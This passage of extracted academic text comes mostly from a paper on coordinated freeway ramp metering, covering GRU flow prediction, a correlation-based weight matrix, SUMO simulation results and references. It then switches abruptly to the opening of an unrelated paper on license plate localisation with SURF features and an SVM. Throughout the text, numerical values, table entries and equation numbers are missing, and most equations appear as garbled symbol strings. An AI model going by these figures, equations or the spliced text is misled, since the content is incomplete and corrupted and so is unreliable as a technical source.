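    # CC_s(x, y) at every possible shift s
    cc = np.correlate(x, y, mode="full")
    return float(cc.max() / denom)

def ramp_weight(ncc_val, dist, flow, l=0.5):
    """Combine correlation, normalized distance and normalized predicted ramp flow
    into one weight, following the piecewise rule above (coefficients illustrative)."""
    if ncc_val <= 0:          # negative correlation: drop the correlation term
        return 0.5 * dist + 0.5 * flow
    if ncc_val <= l:          # weak positive correlation: small correlation weight
        a, b = 0.2, 0.4
    else:                     # strong positive correlation: larger correlation weight
        a, b = 0.5, 0.25
    return a * ncc_val + b * dist + (1.0 - a - b) * flow
```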
for attri;j ¼ ða ;j; a ;j; …; ak;jÞ; ai;j ncc; inflow; distancef g, we can obtain the degree of association grci;j ¼ ðgrc ;j; grc ;j; …; grck;jÞ; pk i¼ grci;j ¼ , and then the influence degree of ramp inflow and downstream speed. the influence degree shows how much influence will the factor affects downstream speed as eq. ( ), where the rs means road section number and k represents the factor number. influencedegreeinflow ¼ rs xk i¼ xrs j¼ grci;j ( ) equation ( ) calculates the final weight matrix. where m is the number of bottlenecks, this weighting matrix will be used in signal coordination optimization to liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ assign the excess traffic demand, in order to ensure the rationality of the traffic reduction at each ramp. wij ¼ wð ; Þ � � � wð ; mÞ .. . � � � .. . .. . wði; jÞ .. . .. . � � � .. . wðn; mÞ �������������� �������������� ( ) coordinated signal optimization the coordinated signal optimization method proposed in this article implements a dynamic weight matrix between the ramp and mainline. the application of this matrix in the bottleneck algorithm is mainly reflected in the calculation of the coordinated metering rate. the bottleneck algorithm first determines whether the road segment downstream of the ramp is a bottleneck based on the real-time occupancy or density of the road segment. when there are no bottlenecks in the multi-ramp area, the local metering rate is applied to each on-ramp. when a bottleneck generates in a road segment, the excess traffic demand for each bottleneck generated needs to be allocated to each ramp. the more restrictive value of the coordinated and local metering rates is taken, and the final ramp metering rate is obtained by considering the ramp queue length limitation. figure shows a segment of multi-ramp road section. initially, the local metering rate rl of each ramp at k time is calculated according to eq. ( ). the k represents metering parameter, and r̂ is the critical density of ramp downstream road section, rðk � Þ is average density of downstream road section at last time step. rlðj; k þ Þ ¼ rlðj; kÞ þ k � ½r̂ � rðkÞ� ( ) defining the difference between the entering flow (including the upstream inflow from the mainline and the flow entering the entrance ramp), and exiting flow (including the downstream outflow from the mainline and the flow exiting the exit ramp) as the excess demand for that segment, see eq. ( ). ddði; k þ Þ ¼ qinði; kÞ þ qonði; kÞ � qoutði; kÞ � qoffði; kÞ ( ) if the average density in a control cycle is higher than the threshold (eq. ( )); at the same time the excess demand is more than zero (eq. ( )), there is a risk of breakdown, defining such a segment as a bottleneck. r i; kð Þ . rthreshold ið Þ ( ) ddði; k þ Þ > ( ) it is necessary to calculate the coordinated metering rate to eliminate bottlenecks, and the coordinated metering rate is calculated as shown in the algorithm . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ every bottleneck needs to reduce the excess demand ddði; k þ Þ, when ddði; k þ Þ < , the bottleneck is eliminating, qreductionði; k þ Þ ¼ . eq. ( ) shows the volume reduction of every ramp, wji is weight matrix. the max volume reduction is selected to calculate the coordinate metering rate in eq. ( ), based on metering rate r(j, k) last time step. 
qreductionði; k þ Þ ¼ ddði; k þ Þ ( ) qreductionði; j; k þ Þ ¼ qreductionði; k þ Þ � wji ( ) rcðj; k þ Þ ¼ rðj; kÞ � max i ½qreductionði; j; k þ Þ� ( ) the system metering rate adopts the more restrictive of coordinate metering rate and local metering rate as eq. ( ) shows. r ðj; k þ Þ ¼ min½rlðj; k þ Þ; rcðj; k þ Þ� ( ) if the ramp metering rate approaches zero, it will cause a ramp spillback, thus affect surface traffic. therefore, the metering rate needs to be constrained based on the queue length of the ramp. in eq. ( ), aðj; kÞ is the arrival rate of vehicles entering the entrance figure bottleneck section. full-size doi: . /peerj-cs. /fig- algorithm coordinate metering rate calculation. input: road section i; weight matrix wji output: coordinate metering rate rc for i in road section do if density > threshold and excess demand > then qreduction (i, k + ) = Δd (i, k + ); qreduction (i, j, k + ) = qreduction (i, k + ) ⋅wji; else i = i + rc (j, k + ) = r (j, k) − maxi [qreduction (i, j, k + )]; return rc liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ramp, v̂ðjÞ is the capacity of the j-th ramp, vðj; kÞ is the queue length of the j-th on-ramp at the previous time step, and t refers to a time step. the metering rate can be obtained by eq. ( ). rqueueðj; k þ Þ ¼ aðj; kÞ � t ½v̂ðjÞ � vðj; kÞ� ( ) rðj; k þ Þ ¼ max½r ðj; k þ Þ; rqueueðj; k þ Þ� ( ) the green duration is calculated based on the metering rate and sent to each signaler in eq. ( ). where c(j) indicates the signal cycle duration and rs(j) indicates the saturation flow rate. gðj; k þ Þ ¼ rðj; k þ Þ rsðjÞ � cðjÞ ( ) experiment traffic flow prediction the dataset used in this article is collected from the california pems platform, which provides -min intervals of freeway mainline loop detector data (both speed and flow) and on-ramp passing data. we select the flow data for the northbound upstream mainline and on-ramp of the i freeway from january to february , which has four on-ramps with a total length of approximately . km. the detector deployment locations show in fig. . combined with the local traffic flow characteristics, it can be found that the traffic flow is at its peak during : – : , which is suitable for applying ramp control. ramp control is not sufficient when the traffic flow is low, smooth traffic flow can be achieved using no control or simple demand capacity control (papageorgiou & kotsialos, ). we plotted the average traffic flow curve of the bottleneck road section over months in fig. . the red curve in the figure indicates the average traffic flow on the road section during the months. the blue part indicates the interval formed by the maximum and minimum traffic volumes. it can be seen from the graph that the traffic flow starts to increase at : and stays at a high level for a long time afterward. the interval we selected is the time segment with relatively high traffic volume, which helps verify the effectiveness of the signal optimization scheme. based on the above findings, flow data from : to : on february upstream of the mainline and the four ramps were selected as inputs, as shown in fig. . figure selected detectors and deployment locations. full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
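before moving on to the prediction experiments, the control side of the framework, namely the coordinate metering rate algorithm together with the local, coordinated, queue and green-time equations above, can be summarized in a short sketch. the dictionary layout, the regulator gain and the pairing of each ramp with its downstream section are assumptions made only for illustration, not the authors' implementation:

```python
def metering_rates(bottlenecks, ramps, W, K=40.0, T=1.0 / 12.0):
    """One control step of the coordinated bottleneck logic sketched above.

    bottlenecks[i]: dict with 'density', 'crit_density', 'threshold' (veh/km)
                    and 'excess' (excess demand, veh/h)
    ramps[j]:       dict with 'rate' (previous metering rate, veh/h),
                    'arrivals' (veh/h), 'capacity' and 'queue' (veh),
                    'cycle' (s) and 'sat_flow' (veh/h)
    W[i][j]:        share of bottleneck i's excess demand assigned to ramp j
    K is the regulator gain and T the control interval in hours.
    """
    rates, greens = [], []
    for j, ramp in enumerate(ramps):
        down = bottlenecks[j]  # assume ramp j merges just upstream of section j
        # local rate driven by the downstream critical density
        r_local = ramp["rate"] + K * (down["crit_density"] - down["density"])

        # coordinated rate: subtract the largest excess-demand share assigned
        # to this ramp over all currently active bottlenecks
        cuts = [b["excess"] * W[i][j] for i, b in enumerate(bottlenecks)
                if b["density"] > b["threshold"] and b["excess"] > 0]
        r_coord = ramp["rate"] - max(cuts) if cuts else float("inf")

        r = min(r_local, r_coord)

        # queue override: keep the on-ramp queue from spilling back
        r_queue = ramp["arrivals"] - (ramp["capacity"] - ramp["queue"]) / T
        r = max(r, r_queue)

        rates.append(r)
        # convert the metering rate into a green duration for the ramp signal
        greens.append(r / ramp["sat_flow"] * ramp["cycle"])
    return rates, greens
```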
https://peerj.com/computer-science/ in this article, the gru neural network is used for traffic flow prediction. the best lag time can minimize the prediction error of the model, and we use the maximum lag time of min. it is more reasonable to use historical values to predict the latter value, and fewer historical values lead to more deviations in the prediction results. more historical values lead to long computation time and are prone to overfitting. in addition to the lag time, we also need to choose the best parameters for the deep neural network model. we use a two-layer gru neural network with hidden cells in each layer, a batch size of , and a max epoch of . the training set uses forty-eight days of data ( . % of the total number of days), the test set uses the remaining nine days of data ( . %). we compare the gru neural network with two other methods, saes and lstms, respectively. we use the rooted mean squared error (rmse) and mean absolute percentage error (mape) as the metric to evaluate these methods. when the predicted value exactly figure traffic volume during months. (a) freeway mainline traffic volume during months. (b) freeway ramp traffic volume during months. full-size doi: . /peerj-cs. /fig- figure mainline and ramp flow demand. full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ matches the true value, rmse is equal to , indicating a perfect model. rmse can be calculated as follows: rmse ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi m xm i¼ ðyi � ŷiÞ s ( ) where yi is the ground truth and ŷi is the prediction value, m represents the total number of predictions. mean absolute percentage error of % indicates a perfect model, while a mape greater than % indicates a flawed model. mape can be calculate as follows: mape ¼ % m xm i¼ ŷi � yi yi ���� ���� ( ) where yi is the ground truth and ŷi is the prediction value, m represents the total number of predictions. the table shows the prediction results of various methods. it can be seen that in the rmse, both lstm and gru are much better than saes. there is little difference between lstm and gru. in the mape column, gru performs the optimal prediction effect. figure shows how the predicted value compares with the observed value and other methods. it can be seen from the figure that all curves fit the observed data. during the low-flow phase, the saes were predicted to be substantially higher than the true values. and the lstm and gru are much closer to the true values. sumo platform simulation of urban mobility (lopez et al., ; krajzewicz et al., ) used in this article is a free and open-source traffic system simulation software compared with the above microsimulation platforms. it can realize microscopic control of traffic flow. each vehicle’s route on the specific road can be planned individually. furthermore, it has a mature code control module, which makes data analysis more convenient. the entire sumo-based simulation framework shows in fig. . we model multi-ramp section in sumo, and entering the traffic flow data during the morning peak period. we use the idm model as car following model. the idm model (treiber, hennecke & helbing, ) is by far the most complete and simple accident-free theoretical heeling model, which belongs to the class of expectation measures. 
the idm model is described in eqs. ( ) and ( ). table the performance comparisons. method rmse mape (%) saes . . lstm . . gru . . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ v a ¼ a � va v � �d � s � va; dvað Þ sa � � " # ( ) s� v; dvð Þ ¼ s þ s ffiffiffiffi v v r þ tav þ vdv ffiffiffiffiffi ab p ( ) the vehicle acceleration v a can be obtained by minimum vehicle distance s � v; dvð Þ, velocity, vehicle clearance from the vehicle in front sa and expected velocity v . in eq. ( ), t represents safety time step, ab represent the max acceleration and the expected deceleration ability of vehicles. dv is speed difference with the car in front, s and s are distance with congested traffic. for model parameter calibrations, see table below. besides, the channel change model is also very critical. the vehicle lane change model we have chosen is lc (erdmann, ). in conjunction with the application in the related literature (papamichail et al., a), the common evaluation metrics are average travel time (att), which indicates the travel time of mainline vehicles; average waiting time (awt), which indicates the waiting figure sumo simulation framework. full-size doi: . /peerj-cs. /fig- figure result of traffic flow prediction. full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ time of ramp vehicles. besides, the density and speed of the bottleneck locations are selected as evaluation metrics, which can reflect the ability to alleviate congestion at the bottleneck locations. results this article uses sumo simulation software to perform experiments on four on-ramp scenarios. the correlation between individual ramps and bottlenecks can be obtained by the method above, leading to the weight matrix. we have used various methods for simulation. no signal method: ramp signal is all green. in this case, the on-ramp traffic can enter the freeway without obstruction. this is used as a control experiment to demonstrate the effect of signal optimization. distance-based method: only the spatial distance between the ramp and the bottleneck is used as a weighting factor for traffic assignment. such an approach would overweight the ramp closest to the bottleneck and assign less weight to the other ramps upstream. such an approach has an absolute static nature. distance-flow-based method: use spatial distance and the on-ramp flow as the assigned weight factors. such an approach considers the contribution of the on-ramp flow to the bottleneck congestion compared to considering only the spatial distance. however, the on-ramp flow may flow at other off-ramps and is not necessarily the root cause of congestion. traffic states-based method: use spatial distance, ramp flow, and dynamic traffic flow correlation as the assigned weighting factors. such a method adds the traffic flow correlation between ramps and bottlenecks to the above method. it better traces the source of congestion and is dynamic and predictable. table shows the results of the weights matrix generated from different factors. our correlation measurement of traffic flow-series reveals that the closest on-ramp upstream may not significantly impact the bottleneck. a particular ramp further upstream may have a greater impact on the bottleneck because of the faster flow growth trend. 
before implementing the signal optimization algorithm, each bottleneck road section's critical density needs to be obtained. as the traffic flow is sensitive to the critical density table model parameters of idm. attribute value description v . m/s expected velocity of vehicles a . m/s the max acceleration ability of vehicles b . m/s the expected deceleration ability of vehicles s , s . m distance with congested traffic t s safety time step d acceleration index l m vehicle length liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ changes, the traffic state can be divided near the critical point. the four bottleneck sections’ critical densities are , , and veh/km, as shown in fig. . we test the performance of the algorithm under normal and heavy demands. there are five lanes and two lanes in the mainline and ramp, separately. so, we use , pcu/h as mainline saturated flow rate and , pcu/h as ramp saturated flow rate (niittymäki & pursula, ). according to the fig. a, we can observe that between : and : , the road section’s average traffic flow is about , pcu/h, which is about . % of the saturated flow rate. moreover, the maximum value is approximately , pcu/h, about . % of the saturation flow rate. in the simulation process, we found that using real mainline demand can cause a congestion situation. instead of increasing the mainline table weight matrix based on different factors. bottleneck bottleneck bottleneck bottleneck distance based ramp . . . . ramp . . . . ramp . . . . ramp . . . . distance and flow based ramp . . . . ramp . . . . ramp . . . . ramp . . . . traffic states based ramp . . . . ramp . . . . ramp . . . . ramp . . . . figure flow-density scatter plot of bottleneck section. (a) flow and density of bottleneck . (b) flow and density of bottleneck . (c) flow and density of bottleneck . (d) flow and density of bottleneck . full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ traffic, we set up a scenario of increasing ramp traffic to simulate heavy ramp traffic and evaluate the signal optimization scheme. as shown in the fig. b, the average traffic flow on the ramp between : and : is about pcu/h. this value is far below the saturated flow rate of , pcu/h. therefore, we added a heavy demand to simulate the busy condition of the ramp. the traffic flow under heavy demand is about – pcu/h, accounting for about . – . % of the saturation flow rate. the normal demand represents releasing vehicles at . % of the mainline saturated traffic demand, . % of the ramp saturated traffic demand. the heavy demand releases vehicles at . % of the mainline saturated traffic demand, . % of the ramp saturated traffic demand. table below shows the performances of each algorithm. it shows that the mainline att improvement using the ramp signal optimization method is limited in normal demand. in contrast, it has a larger improvement in the ramp awt. because when traffic demand is low on the mainline, the on-ramp merges into the mainline, and the ramp signal reduces movement efficiency. in terms of movement through the bottleneck, the traffic-state-based method reduces bottlenecks’ density to a greater extent ( . %) than the other approaches ( . % and . %). compared to other methods, our method has a smaller gap in speed through the bottleneck, but the improvement is relatively significant ( . 
%). The heavy demand scenario simulates over-congestion during peak periods. Here the effect of signal optimization is more pronounced than in the no-signal scenario, with . %, . % and . % improvements in mainline ATT, respectively, although the increase in ramp AWT is smaller than under normal demand. The approach that considers traffic states effectively reduces the bottleneck density under heavy demand, lowering it by an average of . veh/km ( %) and increasing the average speed of vehicles passing through the bottleneck by . %.

Table: performance under different demand (normal and heavy). For each method (no signal, distance based, distance and flow based, traffic states based) the table reports mainline travel time (s), ramp waiting time (s), bottleneck density (veh/km) and bottleneck velocity (km/h), together with the relative change with respect to the no-signal case.

Figure: density heatmap under normal demand. (A) No signal. (B) Distance-based method. (C) Distance-flow-based method. (D) Traffic-state-based method.
Figure: density heatmap under heavy demand. (A) No signal. (B) Distance-based method. (C) Distance-flow-based method. (D) Traffic-state-based method.

Figure shows the average density of the four bottlenecks under normal demand for the different signal optimization algorithms. It reveals persistent congestion in the seventh road section, which the no-control case cannot prevent; in contrast, signal optimization significantly reduces congestion. The distance-flow-based and traffic-state-based methods perform better at congestion reduction, and the traffic-state-based method keeps the density in a much lower range during – min.

Figure shows the average density of the four bottlenecks under heavy demand. Besides the seventh road section, the third and fifth sections also experience intermittent congestion. The traffic-state-based method effectively relieves congestion in the fifth and seventh segments and maintains a lower density at – and – min compared with the others.

Figure shows the variation in mainline travel time under the different demand conditions. It illustrates that signal optimization keeps the mainline ATT relatively low regardless of the demand level; the traffic-state-based method exhibits a lower ATT at more moments, which means smoother vehicle movement.

Conclusions
To address expressway congestion, we propose a coordinated signal optimization framework based on dynamic traffic states. The GRU neural network is used to predict the traffic flow, and cross-correlation captures the dynamic correlation between bottleneck and ramp traffic flows. Compared with previous research, our framework considers both static road properties and the dynamic traffic state to achieve signal optimization. The performance of our algorithm was verified on the SUMO simulation platform.
The results show that our approach can reduce the mainline bottleneck density by . % and . % under normal and heavy demand, respectively. We also found that, in low traffic demand scenarios, not using a signal is the more reasonable option, whereas in congested scenarios signal optimization clearly reduces the mainline density. In future work, we will address signal optimization for the broad ramp area; using detailed traffic trajectory data to analyze the spatial and temporal characteristics of congestion, we will develop a coordinated signal optimization program.

Figure: total travel time. (A) Normal demand situation. (B) Heavy demand situation.

Additional Information and Declarations

Funding
This work is supported by the National Natural Science Foundation of China ( and ), the Zhejiang Province Basic Public Welfare Research Project (LGG F ), the Zhejiang Provincial Natural Science Foundation (LR F ), and the Fundamental Research Funds for the Provincial Universities of Zhejiang (RF-B ). There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

Grant Disclosures
The following grant information was disclosed by the authors: National Natural Science Foundation of China: and . Zhejiang Province Basic Public Welfare Research Project: LGG F . Zhejiang Provincial Natural Science Foundation: LR F . Fundamental Research Funds for the Provincial Universities: RF-B .

Competing Interests
Xiangjie Kong is an Academic Editor for PeerJ.

Author Contributions
Zhi Liu conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Wendi Shu conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Guojiang Shen performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Xiangjie Kong performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.

Data Availability
The following information was supplied regarding data availability: data and code are available at GitHub: https://github.com/wendyshu /signalopt.

References
Bakar ZA, Mohemad R, Ahmad A, Deris MM. A comparative study for outlier detection techniques in data mining. In: IEEE Conference on Cybernetics and Intelligent Systems. Piscataway: IEEE.
Berkhin P. A survey of clustering data mining techniques. In: Kogan J, Nicholas C, Teboulle M, eds. Grouping Multidimensional Data. Heidelberg: Springer.
Berndt DJ, Clifford J. Using dynamic time warping to find patterns in time series. In: KDD Workshop.
Chang TH, Li ZY. Optimization of mainline traffic via an adaptive co-ordinated ramp-metering control model with dynamic OD estimation. Transportation Research Part C: Emerging Technologies.
Chen J, Lin L, Jiang R. Assigning on-ramp flows to maximize capacity of highway with two on-ramps and one off-ramp in between. Physica A: Statistical Mechanics and its Applications.
Chen J, Lin W, Yang Z, Li J, Cheng P. Adaptive ramp metering control for urban freeway using large-scale data. IEEE Transactions on Vehicular Technology.
Chen Y, Liu F, Bai Q, Tao C, Qi X. Coordinated ramp metering based on real-time OD information. IEEE Access.
Cho K, van Merriënboer B, Gulcehre C, Bahdanau D, Bougares F, Schwenk H, Bengio Y. Learning phrase representations using RNN encoder-decoder for statistical machine translation. In: Proceedings of the Conference on Empirical Methods in Natural Language Processing (EMNLP).
Dabiri A, Kulcsar B. Distributed ramp metering—a constrained discharge flow maximization approach. IEEE Transactions on Intelligent Transportation Systems.
Erdmann J. SUMO's lane-changing model. In: Behrisch M, Weber M, eds. Modeling Mobility with Open Data—Lecture Notes in Mobility. Cham: Springer.
Feng Y, Yu S, Zhang K, Li X, Ning Z. COMICS: a community property-based triangle motif clustering scheme. PeerJ Computer Science.
Frejo JRD, Camacho EF. Global versus local MPC algorithms in freeway traffic control with ramp metering and variable speed limits. IEEE Transactions on Intelligent Transportation Systems.
Fu R, Zhang Z, Li L. Using LSTM and GRU neural network methods for traffic flow prediction. In: Proceedings of the Youth Academic Annual Conference of Chinese Association of Automation.
Han X, Shen G, Yang X, Kong X. Congestion recognition for hybrid urban road systems via digraph convolutional network. Transportation Research Part C: Emerging Technologies.
He L, Agard B, Trépanier M. A classification of public transit users with smart card data based on time series distance metrics and a hierarchical clustering method. Transportmetrica A: Transport Science.
Hegyi A, De Schutter B, Hellendoorn J. Optimal coordination of variable speed limits to suppress shock waves. IEEE Transactions on Intelligent Transportation Systems.
Kong X, Tong S, Gao H, Shen G, Wang K, Collotta M, You I, Das S. Mobile edge cooperation optimization for wearable Internet of Things: a network representation-based framework. IEEE Transactions on Industrial Informatics.
Kong X, Wang K, Wang S, Wang X, Jiang X, Guo Y, Shen G, Chen X, Ni Q. Real-time mask identification for COVID-19: an edge computing-based deep learning framework. IEEE Internet of Things Journal.
Kontorinaki M, Karafyllis I, Papageorgiou M. Local and coordinated ramp metering within the unifying framework of an adaptive control scheme. Transportation Research Part A: Policy and Practice.
Krajzewicz D, Erdmann J, Behrisch M, Bieker L. Recent development and applications of SUMO—Simulation of Urban Mobility. International Journal on Advances in Systems and Measurements.
Kumar K, Parida M, Katiyar V. Short term traffic flow prediction for a non urban highway using artificial neural network. Procedia—Social and Behavioral Sciences.
Li Z, Zhao Y, Liu R, Pei D. Robust and rapid clustering of KPIs for large-scale anomaly detection. In: IEEE/ACM International Symposium on Quality of Service. Piscataway: IEEE.
Liao TW. Clustering of time series data—a survey. Pattern Recognition.
Lipp LE, Corcoran LJ, Hickman GA. Benefits of central computer control for Denver ramp-metering system. Transportation Research Record.
Liu Q, Wang B, Zhu Y. Short-term traffic speed forecasting based on attention convolutional neural network for arterials. Computer-Aided Civil and Infrastructure Engineering.
Lopez PA, Behrisch M, Bieker-Walz L, Erdmann J, Flötteröd YP, Hilbrich R, Wiebner E. Microscopic traffic simulation using SUMO. In: IEEE Intelligent Transportation Systems Conference. Piscataway: IEEE.
Lv Y, Duan Y, Kang W, Li Z, Wang F-Y. Traffic flow prediction with big data: a deep learning approach. IEEE Transactions on Intelligent Transportation Systems.
Meng Q, Khoo HL. A Pareto-optimization approach for a fair ramp metering. Transportation Research Part C: Emerging Technologies.
Meshkat A, Zhi M, Vrancken JLM, Verbraeck A, Yuan YF, Wang YB. Coordinated ramp metering with priorities. IET Intelligent Transport Systems.
Niittymäki J, Pursula M. Saturation flows at signal-group-controlled traffic signals. Transportation Research Record: Journal of the Transportation Research Board.
Paesani G, Kerr J, Perovich P, Khosravi FE. System Wide Adaptive Ramp Metering (SWARM): merging the transportation and communications revolutions. Washington, D.C.: Abstracts for ITS America Seventh Annual Meeting and Exposition.
Papageorgiou M, Kotsialos A. Freeway ramp metering: an overview. IEEE Transactions on Intelligent Transportation Systems.
Papamichail I, Kotsialos A, Margonis I, Papageorgiou M. Coordinated ramp metering for freeway networks—a model-predictive hierarchical control approach. Transportation Research Part C: Emerging Technologies.
Papamichail I, Papageorgiou M, Vong V, Gaffney J. Heuristic ramp-metering coordination strategy implemented at Monash Freeway, Australia. Transportation Research Record: Journal of the Transportation Research Board.
Paparrizos J, Gravano L. k-Shape: efficient and accurate clustering of time series. In: Proceedings of the ACM SIGMOD International Conference on Management of Data. New York: ACM.
Schmitt M, Ramesh C, Lygeros J. Sufficient optimality conditions for distributed, non-predictive ramp metering in the monotonic cell transmission model. Transportation Research Part B: Methodological.
Shen G, Zhao Z, Kong X. GCN2CDD: a commercial district discovery framework via embedding space clustering on graph convolution networks. IEEE Transactions on Industrial Informatics. Piscataway: IEEE.
Su Y, Zhao Y, Xia W, Liu R, Bu J, Zhu J, Wang Z. CoFlux: robustly correlating KPIs by fluctuations for service troubleshooting. In: Proceedings of the International Symposium on Quality of Service.
Treiber M, Hennecke A, Helbing D. Congested traffic states in empirical observations and microscopic simulations. Physical Review E.
Uras N, Marchesi L, Marchesi M, Tonelli R. Forecasting Bitcoin closing price series using linear regression and neural networks models. PeerJ Computer Science.
Van de Weg GS, Hegyi A, Hoogendoorn SP, De Schutter B. Efficient freeway MPC by parameterization of ALINEA and a speed-limited area. IEEE Transactions on Intelligent Transportation Systems.
Williams B, Hoel L. Modeling and forecasting vehicular traffic flow as a seasonal ARIMA process: theoretical basis and empirical results. Journal of Transportation Engineering.
Yu DJ, Liu CF, Wu YY, Liao S, Anwar T, Li WQ, Zhou CB. Forecasting short-term traffic speed based on multiple attributes of adjacent roads. Knowledge-Based Systems.
Zhang G, Wang Y. Optimizing coordinated ramp metering: a preemptive hierarchical control approach. Computer-Aided Civil and Infrastructure Engineering.
Zhang H, Wang X, Cao J, Tang M, Guo Y. A hybrid short-term traffic flow forecasting model based on time series multifractal characteristics. Applied Intelligence.
Zhang C, Wang J, Lai J, Yang X, Su Y, Dong Z. Extracting origin-destination with vehicle trajectory data and applying to coordinated ramp metering. Journal of Advanced Transportation.
Zheng H, Lin F, Feng X, Chen Y. A hybrid deep learning model with attention-based Conv-LSTM networks for short-term traffic flow prediction. IEEE Transactions on Intelligent Transportation Systems. Piscataway: IEEE.
International Conference on Sensor Network and Computer Engineering (ICSNCE)

Multiple Vehicle License Plate Location in Complex Background
Yaxin Zhao (School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China; e-mail: @qq.com), Li Zhao (School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China; e-mail: @qq.com), Ya Li (Chongqing Water Resources and Electric Engineering College, Chongqing, China; e-mail: @qq.com)

Abstract: To broaden the applicability of intelligent traffic management systems and to address the low accuracy of license plate positioning under changing scenes, a localization method is proposed on the basis of analyzing the advantages and disadvantages of previous approaches. The image is expressed as a graph in the sense of graph theory, and target objects in the vehicle image are preliminarily separated based on the minimum spanning tree principle. Candidate regions are then selected, searched and merged using color, size, texture and fill similarity, which yields the suspicious license plate regions. The rectangular contours obtained from this coarse positioning are represented with a bag of visual words, and a support vector machine (SVM) classifies the rectangular regions so that the license plate is located accurately. On the pieces of test samples, the method achieves an accuracy of . % and strong robustness to interference.

Keywords: license plate location; complex background; bag of visual words; support vector machine; license plate vertical texture

At present, the main approach to license plate location is based on morphological features. Such algorithms mainly exploit the texture characteristics of the plate: after morphological processing, part of the background noise is removed, and the plate is then located using geometric features such as the aspect ratio. Because only a single texture feature of the plate is used and other characteristics are ignored, when the background contains objects with a texture similar to that of the plate, geometric criteria such as the aspect ratio alone are insufficient to decide whether a region is a license plate.
This eventually leads to wrong localization. A second family of methods is positioning based on color images [ ]. These algorithms make full use of the color information of the license plate and locate it through the characteristics of different color spaces. However, the color models operate on multi-channel representations of the image, which implies a large amount of computation and poor real-time performance. When the color of the license plate region is very similar to its surroundings, the positioning error rate increases; moreover, the color information is susceptible to illumination changes, which affects the extraction of the plate characters and again leads to wrong localization. A third family is based on BP neural networks: the image is divided into many blocks, and a neural network classifies a feature descriptor extracted from each block to locate the plate. However, the block size is unrelated to the actual size of the plate in the image, so the extracted characteristics cannot truly reflect the global features of the license plate; in addition, convergence is slow and the BP algorithm easily falls into local optima.

I. Visual Word Package Model of the License Plate Localization Algorithm
Previous localization algorithms based on texture features can, after morphological processing, effectively turn the license plate area into a rectangular connected region, but it is difficult to further improve their accuracy: if an interfering region has texture similar to the plate, it also forms a rectangular connected domain, and relying only on the aspect ratio makes it hard to distinguish true plate regions from false ones. The result is poor robustness to interference and a high misjudgment rate. To address this problem, the rectangular-region filtering step uses a bag of visual words together with a support vector machine (SVM) to improve filtering accuracy. The basic principle of the bag of visual words is to express an image through feature descriptors, treating the picture as a set of feature points; by counting the frequency of each visual word in a single photo, the image is represented as a vector, i.e., as a histogram [ ]. Figure shows the basic workflow of the bag-of-words model. Since different types of pictures yield different bag-of-words vectors, an appropriate classifier can be trained on a sample set and then used to classify test images.

Figure: flow chart of the BoW model.

Considering that license plate images are affected by viewing angle, illumination and other factors, and in order to reduce the influence of such factors on the descriptors of the plate region while allowing fast localization, this paper adopts the SURF feature descriptor. SURF is fast to compute and partially invariant: it is robust to scaling within a certain range, image rotation, perspective change, illumination change and image blur, so it can effectively suppress the influence of lighting, angle and similar factors.
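As a practical illustration of this step, the short sketch below detects local feature points on a grayscale candidate image with OpenCV. SURF is only available in opencv-contrib builds that include the non-free module, so the sketch falls back to ORB when SURF is absent; the threshold and feature count are assumptions, not values from the paper.

```python
import cv2

def detect_keypoints(gray_img):
    """Detect local features on a grayscale plate-candidate image.
    Tries SURF (opencv-contrib, non-free build); falls back to ORB otherwise."""
    try:
        detector = cv2.xfeatures2d.SURF_create(hessianThreshold=400)
    except AttributeError:
        detector = cv2.ORB_create(nfeatures=500)  # free alternative, different descriptor
    keypoints, descriptors = detector.detectAndCompute(gray_img, None)
    return keypoints, descriptors

# usage sketch:
# img = cv2.imread("car.jpg", cv2.IMREAD_GRAYSCALE)
# kps, des = detect_keypoints(img)
```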
The SURF descriptor extraction uses the Hessian matrix to determine candidate points, followed by non-maximum suppression to realize the feature point detection. For an image function f(x, y), the Hessian matrix of a pixel is defined as

$$H(f(x,y)) = \begin{bmatrix} \dfrac{\partial^2 f}{\partial x^2} & \dfrac{\partial^2 f}{\partial x\,\partial y} \\[2mm] \dfrac{\partial^2 f}{\partial x\,\partial y} & \dfrac{\partial^2 f}{\partial y^2} \end{bmatrix}$$

The discriminant of the Hessian matrix is

$$\det(H) = \frac{\partial^2 f}{\partial x^2}\,\frac{\partial^2 f}{\partial y^2} - \left(\frac{\partial^2 f}{\partial x\,\partial y}\right)^2$$

